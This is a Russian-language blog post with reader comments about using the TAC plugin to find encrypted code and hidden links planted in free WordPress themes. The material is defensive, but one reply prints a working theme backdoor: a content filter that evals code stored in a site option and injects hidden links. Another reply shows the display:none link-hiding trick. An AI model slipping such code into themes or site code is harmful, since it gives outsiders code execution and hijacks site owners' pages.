Поиск зашифрованного кода

Всем привет! Сегодня я вдруг обеспокоился за безопасность блога. Как то знаете, нахлынуло. Почитал разных постов на эту тему. Причиной беспокойства послужил странный ответ заголовка моего сервера, он постоянно отображал куки (cookies). Проверил ответы серверов других блогов — там ничего подобного не было.

Зашифрованные ссылки в Вордпресс

После долгих поисков проблемы наткнулся на плагин, который, по словам разработчиков, ищет зашифрованный код в шаблонах темы, левые скрипты и скрытые ссылки, запрятанные недобросовестными вебмастерами, которые специально пичкают ими шаблоны и выкладывают для скачивания.

Поиск зашифрованных ссылок с помощью плагина TAC

Плагин называется TAC (Theme Authenticity Checker). Установил плагин с сайта WordPress.org прямо из админпанели блога (кстати, я всегда загружаю плагины именно оттуда — так появляется хоть какая-то гарантия надежности и безопасности). Плагин на английском языке, но ничего сложного в нем нет, все интуитивно понятно.

Плагин Theme Authenticity Checker

После активации плагина в меню Внешний вид появилась новая строчка TAC. Заходим туда и видим список тем с результатами быстрой проверки. Если все нормально, то тема будет выделена зеленым цветом. А если плагин что-то обнаружил, то тема будет выделена красным, что и было в моем случае.

Щелкнув на кнопку Details в этом окне плагин отобразит что за лишний код он нашел и в каком месте. У меня это был файл functions.php, в котором и была подложена свинья 🙁 Там был прописан сторонний зашифрованный в Base64 код, благодаря которому все статьи которые я публикую отсылались на другой блог и автоматом публиковались там. А в подвале, в файле footer.php, находились зашифрованные ссылки. К счастью, тот блог уже не существует и за сохранность текстов можно не беспокоиться. Вот так благодаря этому плагину я повысил надежность своего блога.

Ссылки и вредоносный код я конечно же удалил и теперь моя тема не содержит потенциально опасного кода, о чем говорит зеленая подпись «Theme Ok!»

Зашифрованные ссылки в футере (подвале) блога

В подвале правда найдена одна статичная, не зашифрованная ссылка, но это счетчик Feedburner — о нем можно не беспокоиться. Так как плагин предназначен для разового применения, то я его деактивировал, чтобы не потреблял ресурсы сервера. А когда наступит время и вновь захочется сменить шаблон, то обязательно им воспользуюсь снова 😉

В чем опасность зашифрованных ссылок

А сейчас о тех последствиях, которые могли наступить в моей ситуации. Как я уже сказал, левый код, который я успешно ликвидировал, предполагал кражу контента с блога. Теперь представьте, сколько людей может использовать этот же шаблон и с каждого идет бесплатный контент — недобросовестному вебмастеру только и оставалось, как наблюдать за происходящим и радоваться.

И что самое приятное — снова проверил ответ сервера и обрадовался — все в порядке, нет никаких cookies!

Для справки: cookies — сохраняемые данные для последующей аутентификации, с сохранением персональных данных, в том числе логинов и паролей.

Ну и конечно же по таким ссылкам утекает вес страниц и порой на ресурсы сомнительного содержания…

Всем советую также воспользоваться этим плагином, а сам пойду дальше изучать тему безопасности) А Вы проверяли свои темы (шаблоны) блогов на наличие зашифрованных ссылок и прочего стороннего кода, который может нанести серьезный удар по безопасности?

  1. 5
  2. 4
  3. 3
  4. 2
  5. 1
(1 голос, в среднем: 5 из 5)
  1. seoceo

    Спасибо за инфу, а подключенные плагины он может проверять?

    Ответить

  2. Webliberty

    seoceo, к сожалению нет, плагин проверяет только темы WordPress. Загружайте плагины с официального сайта WordPress и проблем с плагинами быть не должно 😉

    Стоит внимательно относится к русифицированным плагинам, скачанным со сторонних сайтов, не являющихся официальной страницей, т.к. зачастую в них могут быть вставлены посторонние коды, а также внешние ссылки по которым будет утекать вес!

    Ответить

  3. Александр

    Надеюсь, стандартную тему Вордпресса проверять не надо. Я не менял её — только картинку сменил в шапке. Как раз потому что наслышан об уязвимостях сторонних тем и других проблемах с ними.

    Ответить

  4. Webliberty

    Александр, стандартную тему можно не проверять, там проблем быть не должно 🙂

    Ответить

  5. Бабай

    Плагин TAC должен быть обязательно, я его всегда в первую очередь устанавливаю, работает он четко. Еще бы он мог удалять эти ссылки.

    Ответить

  6. Webliberty

    Бабай, неплохо было бы) Но я его устанавливаю только если тему меняю. Активировать его при проверенной нет смысла, только ресурсы будет потреблять.

    Ответить

  7. ZeroXor

    Хммм, а ведь это тема!!! Надо будет поподробнее изучить работу с WordPress, ну и начать клепать симпатичные темы 😀

    Ответить

  8. Tatyanka

    TAC очень уважаю, и он действительно всегда искал зашифрованные, и простые ссылки в теме, но в последнее время у меня, он не может найти ни одного кода в шаблоне, хотя тема полностью набита левыми ссылками, вот и приходилось ручками все искать, хотя было написано, что тема «ОК, чистая». Может он плохо работает с новым вордпрессом, кто его знает?

    Ответить

  9. Webliberty

    ZeroXor, ха-ха) Ставить свои ссылки в шаблоны? Тогда у меня наверное возрастут переходы с поисковиков по запросу «как удалить зашифрованные ссылки» 😀

    Tatyanka, в последний раз я проверял тему почти больше полугода назад, после этого тему не менял, так что не знаю как он работает на последних версия Вордпресс. Последнее обновление плагина в 2009 году, совместимость подтверждена вплоть до версии 3.0.5. Вероятность несовместимости на самом деле велика.

    Ответить

  10. Wert

    Так плагин актуален или нет? Лично у меня обновление стоит последнее и как только выходит новая версия я стараюсь обновиться.

    Насчет шаблонов (левых) — способ «ручками» самый лучший! Каким бы не был хорош плагин, НО человек всё увидит…

    Так-же есть сервисы, которые сканируют Ваш любимый блог на наличие внешних ссылок (в том числе и плагинов). Дерзайте! А плагин сегодня проверю.

    Ответить

  11. Webumniza

    Всем привет! E меня плагин ТАС стоит, очень довольна его работой, но отключать не собираюсь, потому как при каждом обновлении ВП или плагина ваша чистая тема, может получить код в том месте, которое вы спокойно считаете чистым. У меня так получилось уже не один раз, потому храните файлы своей чистой темы на всякий случай, так как не каждый обладает достаточными знаниями, чтобы суметь удалить код.

    Tatyanka: плагин проверяет только коды в теме и статичные ссылки. Если у вас стоят плагины, ставящие ссылки в noindex и nofollow, то их ТАС не видит.

    Ответить

  12. Tatyanka

    Это я прекрасно знаю, но такие плагины не использую и точно могу сказать, что ничто не мешает работать этому плагину на блоге, и то что он не видит ссылок, это не в первый раз. Поэтому, искать и чистить в ручную.

    Ответить

  13. Людмила

    Спасибо за статью. Я проверила свой сайт, однако была найдена статическая ссылка на другой сайт. Подскажите пожалуйста, что с ней делать?

    Ответить

  14. Тамара

    У меня так и получилось. Стала менять тему с проверенного и надежного сайта вордпресса. И полетел полностью мой сайт. Я пока не умею восстанавливать грамотно. Пыталась что-то там исправить на хостинге, в результате вообще все запорола.

    Сейчас сделала временный поддомен, чтобы хоть как-то продолжать работу. Но основной сайт загублен. Мне написали с хостинга, что файлы сохранены и зайдите на территорию домашней страницы. Но я не имею понятия что это такое. Наверное, нет смысла таким как я делать что-то серьезное. Сидела бы себе в соц. ресурсах и дальше, а так расстроилась дальше некуда.

    Ответить

  15. Webliberty

    Выходит что все же следует проверять все вручную, дополнительно. Как говориться: доверяй, но проверяй!

    Людмила, это ссылка на автора шаблона (находится в подвале блога, вероятно в файле footer.php), а рядом еще стоит ссылка на переводчика темы. Оставлять или нет такие ссылки — на Ваше усмотрение, но атрибут rel="nofollow" я бы в любом случае поставил, если его еще нет.

    Тамара, полностью можно доверять только сайту wordpress.org — все остальные не гарантируют безопасности. Нужно было сразу же писать в техподдержку и просить не выдать резервную копию, а полностью восстановить блог, они бы Вам сами все сделали. Всегда если что-то случилось не нужно пороть горячку — действия в такие моменты не обдуманны и почти всегда неправильны, лучше успокоиться и поискать ответа, затратив немного времени.

    Ответить

  16. Людмила

    Спасибо большое за подсказку. Я в кодах не смыслю. Скажите пожалуйста а rel="nofollow" где именно поставить. У меня вордпресс. Во вкладки внешний вид, редактор имеется кодировка темы. Там надо поставить? Подскажите как правильно сделать.

    Просто я очень боюсь что-то менять. Я тогда туда рекламу поставить хотела, пришлось откат делать.

    Ответить

  17. Webliberty

    Людмила, в файле footer.php своей темы найдите строчку со ссылкой на этот сайт и добавьте атрибут:

    <a href="https://example.com/" rel="nofollow"></a>

    Вкратце поясню что это за тег и зачем он нужен. Все ссылки ведущие на внешние ресурсы (на другие сайты) передают вес страницы. Под весом страницы подразумеваются такие seo-показатели, как ТИЦ и PR. Открытые ссылки без этого атрибута передают этот вес, а с атрибутом — нет. Т.е. поисковый робот не будет переходить по этим ссылкам (даже если перевести с английского — получится «не следовать»).

    К примеру в комментариях, ссылки которые оставляют комментаторы на свои блоги также имеют этот атрибут по-умолчанию. И еще — если перейти у Вас по ссылке на переводчика темы — то там откроется сайт совсем сторонней тематики, владелец явно был сменен, впрочем как и тема и ее можно удалить.

    Ответить

  18. Людмила

    Спасибо большое. Сделала как Вы написали. Вроде получилось. Только в подвале после ссылки на вебсайт какие-то знаки отобразились, но это в принципе не важно. Спасибо большое за терпение в обучении чайника 😉

    Ответить

  19. Webliberty

    Людмила, так Вы удалите эти значки в том же файле и все) Пожалуйста!

    Ответить

  20. Светлана

    Плагином ТАС уже давно убрала ненужные ссылки с темы. Но левые ссылки все еще присутствуют какие-то. Возможно, дело в плагинах, я не помню где и когда скачивала, не факт, что все с официального сайта.

    Не сочтите за труд, напишите, если понимаете в этом, как определить зараженный сторонним кодом плагин и наиболее безболезненно удалить код и ссылку?

    Ответить

  21. Webliberty

    Светлана, никаких сторонних внешних ссылок я не наблюдаю на Вашем блоге, просмотрел исходный код главной и внутренней страницы. Также проверил страницы плагином RDS bar, который также не подтвердил Ваших опасений.

    Информация, которую выдает Бинг может быть не актуальной, т.е. показывать устаревшие данные. В будущем загружайте плагины только из проверенных источников!

    Ответить

  22. Светлана

    Спасибо большое за то, что проверили мой блог, а то я уже всю голову сломала по этому поводу. Отдельное спасибо за подсказку использовать RDS bar.

    Ответить

  23. Наталья

    А я проверила тему, нашлись зашифрованные коды, и не удаляются, пишут что нельзя менять в лицензированной теме, что делать?

    Ответить

  24. Webliberty

    Наталья, не использовать лицензионные платные темы бесплатно 🙂 Если честно, то я взглянул на Вашу тему и не считаю что те 2 ссылки, которые зашифрованы, ведут на авторов шаблона (что по идее должно быть есть тема действительно лицензионная). Попробуйте в сети найти такую же тему, но «чистую» без посторонних ссылок.

    Ответить

  25. Наталья

    Webliberty, спасибо, попробую поискать. Это мой первый сайт, первая тема, я даже и не знала, лицензированные или нет темы. Скачала с какого-то сайта не задумываясь. А на что могут влиять эти ссылки. Ведь внешне их не видно, зачем они нужны?

    Ответить

  26. Webliberty

    Наталья, знаете почему их не видно? Потому что ссылки заключены в такой стиль:

    <div style="display:none">ссылки</div>

    Они скрыты от глаз посетителей, а ПС не любят когда от них что-то скрывают преднамеренно — это первая опасность. А вторая заключается в том, что они передают вес на те сайты. Т.е. такие seo-показатели как ТИЦ и PR утекают с Ваших страниц. Да и вообще они ведут на сайты подозрительного содержания, зачем это нужно?

    Наталья, еще много чего предстоит узнать и не всегда новости приятные… Тему можно найти такую же, но уже без ссылок.

    Ответить

  27. Наталья

    Ура, ура, я нашла тему без ссылок, спасибо Вам большое!!!!!!!!!

    Ответить

  28. Людмила

    Хорошая статья. Уже дважды выручила. Создала новый сайт, поставила тему, а там таких зашифрованных ссылок аж 2. В сайтбаре и в подвале. В сайтбаре сразу заметила, а в подвале помучилась. Теперь все чисто. Супер

    Ответить

  29. Валя

    Спасибо, установила. Все зеленое, но вот написано что: 8 Static Link(s) Found… И в деталях перечисление. Это в моей установленной теме. Что с ними делать? Удалять? Они что-то портят?

    Ответить

  30. Webliberty

    Валя, посмотрите куда ведут эти ссылки. Ставили ли Вы их самостоятельно или они изначально были спрятаны в шаблоне. Если сами не ставили, то ищите и удаляйте. Ничего хорошего они не принесут.

    Ответить

  31. Дмитрий

    Спасибо за статью, но что делать когда плагин ТАС показывает «ОК», а через RDS bar в одной статье все равно показывает внешнюю ссылку. Причем скрытую (зашифрованную), я ее найти не могу через поиск по коду и почему-то именно в одном посте. Причем анкор этой ссылки выбран в виде точки (.).

    Я в коде страницы его не вижу. Далее удалил это предложение с точкой. Обновил страницу, проверил снова, а ссылочка то сместилась в другое предложение на другую точку. Вот такая вот задачка… Помогите пожалуйста с этим разобраться.

    Ответить

  32. Webliberty

    Дмитрий, здравствуйте! Вы знаете, я тоже встречался с такой проблемой. Причем ссылка могла перемещаться с одной точки на другую и скорее всего я Вас разочарую, если скажу что такая ссылка у Вас не одна. Причина — файл functions.php. Найдите в нем следующий код:

    add_filter('the_content', '_bloginfo', 10001);
    function _bloginfo($content){
    	global $post;
    	if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
    		return $co;
    	}
    	else return $content;
    }

    и смело его удаляйте.

    Ответить

  33. Дмитрий

    Webliberty, спасибо. Я уже справился с данной проблемой именно таким образом, как Вы написали. Этот код был прописан автором бесплатного шаблона вордпресс.

    Ответить

  34. Александр x3m

    Классный плагин! Одну ссылку на морестайл нашел!

    Ответить

  35. Елена

    Денис, здравствуйте, я опять обращаюсь за помощью. Проблема на моем втором сайте. Выбрала тему (BabyStore), она мне очень нравится, но беда – на странице выскакивает (иногда сразу же, а иногда спустя время) рекламный баннер с предложением товаров.

    Неделю я пыталась найти его код и удалить, но смогла найти только строки, отвечающие за его появление. Их можно увидеть ТОЛЬКО через просмотр кода элемента (достаточно кликнуть в любое место страницы даже, когда баннера нет). Я их пометила, они идут сразу за меткой в конце страницы и заканчиваются перед точкой. Ни в коде странице, ни в папках темы этих строк нет. Вероятно, какой-то код в файлах темы выводит эти строки, но как найти место, где он находится.

    Очень надеюсь на Ваш совет или помощь посетителей Вашего блога. В какую хоть строну смотреть? У меня скоро мозги закипят. От темы не хочу отказываться.

    Ответить

  36. Елена

    Хочу добавить, в WP версии 3.9.2 в папке wp-includes/css/dashicons.min.css?ver=3.9.2 я обнаружила странную конструкцию, которая начинается так:

    url(data:application/x-font-woff;charset=utf-8;base64...

    дальше идет длинная абракадабра.

    Денис, я буду Вам очень и очень признательна, если Вы согласитесь посмотреть всю конструкцию. Я хочу понять код это или нет. Я пробовала его раскодировать в разных серверах – ничего не получается. В окошке результата получала либо туже конструкцию, либо ничего – пустое окно.

    И еще, к вашему диалогу с Дмитрием. Как быть, если в файле functions.php нет похожего кода, а скрытые внешние ссылки в статьях присутствуют, причем очень много, их видно в исходном коде страницы.

    Если бы я не собралась делать второй сайт, то так и не узнала бы, какой кошмар творится с этими скрытыми кодами. Я ведь проверила плагином ТАС, убрала все, что он показал и успокоилась. А это была только верхушка айсберга. А я еще удивляюсь, почему падает трафик. На самом деле с таким количеством невидимых внешних ссылок многие из нас уже давно должны бы идти в баню. А Яндекс все это безобразие терпит.

    Одним словом, давайте всем миром друг дружке советами помогать. Я, если разберусь с этой ерундой, обязательно опишу, что и как делала.

    Ответить

  37. Webliberty

    Елена, что касается первого вопроса, то воспроизвести проблему не удается, сейчас на сайте активна стандартная тема Twentythirteen. Если понравившаяся тема содержит вредоносный код — самое простое что можно сделать, это поискать шаблон в другом месте. Большинство сайтов, распространяющих темы бесплатно, намеренно внедряют в них скрытый код и ссылки.

    Файл dashicons.min.css не представляет угрозы. В нем содержится иконочный шрифт, который применяется в админке WP. Т.е. большинство иконок интерфейса выполнены не картинками, а шрифтами. Очень полезная штука. Искать вредоносный код нужно в папке с шаблоном, а Вы смотрите уже на стандартные файлы движка.

    Существует множество различных способов внедрить скрытые ссылки на сайт, поэтому ориентироваться только лишь на тот пример из functions.php не стоит. Если похожего кода не нашли, значит есть другой.

    Напишите мне на электронную почту и отправьте адрес сайта с которого скачали эту тему — посмотрю.

    Ответить

  38. Елена

    …для тех, кому интересно все, что связано со скрытыми ссылками и кодами. Информация скорее для новичков. На одном моем сайте массово присутствовали скрытые ссылки в статьях, которые можно было увидеть только в исходном коде страницы. На другом сайте появлялся рекламный баннер. Оба шаблона бесплатные, скаченные с разных ресурсов.

    Я бы не потратила так много времени на решение этих проблем, если бы была внимательна при выборе шаблонов и обратила бы внимание на предупреждения, которые присутствовали на сайтах, где я скачивала темы (спасибо Денису, я так бы и не узнала об этих предупреждениях, а он сразу их увидел). Предупреждения говорили о том, что в темах есть зашифрованные коды. Только на одном сайте предлагали по желанию убрать код, подробно объясняя, как это можно сделать, а на другом предлагали заплатить и получить шаблон без кодов. Я не стала использовать второй вариант, а первый использовала, и за два клика убрала все чужие ссылки.

    Резюме простое – будьте внимательны при выборе бесплатных тем, это убережет ваше время, нервы и деньги.

    Еще раз спасибо Денису за помощь.

    Ответить

  39. Sergey

    При установке плагина вышли сообщения:

    «Encrypted Code Found!» и «2 Static Link(s) Found…»

    Нажимая на кнопку Details ничего не происходит… Проверяю на сайте pr-cy.ru/link_extractor выходит 6 ссылок на левые сайты… Пробовал отключить все плагины, результат тот же. Что можно сделать? Где искать эти ссылки?

    Ответить

  40. Webliberty

    Искать в файлах шаблона. Тщательно проверьте footer.php — это самое распространенное место, куда любят ставить вредоносный код и ссылки.

    Попробуйте скачать шаблон с другого сайта — возможно там этих проблем уже не будет. Именно поэтому я рекомендую загружать темы и плагины из официального репозитория WordPress.

    Ответить

:) ;) :D :( :cry: :| :o :P 8-) :oops: :roll: :idea:

Отправляя комментарий, вы соглашаетесь с политикой конфиденциальности.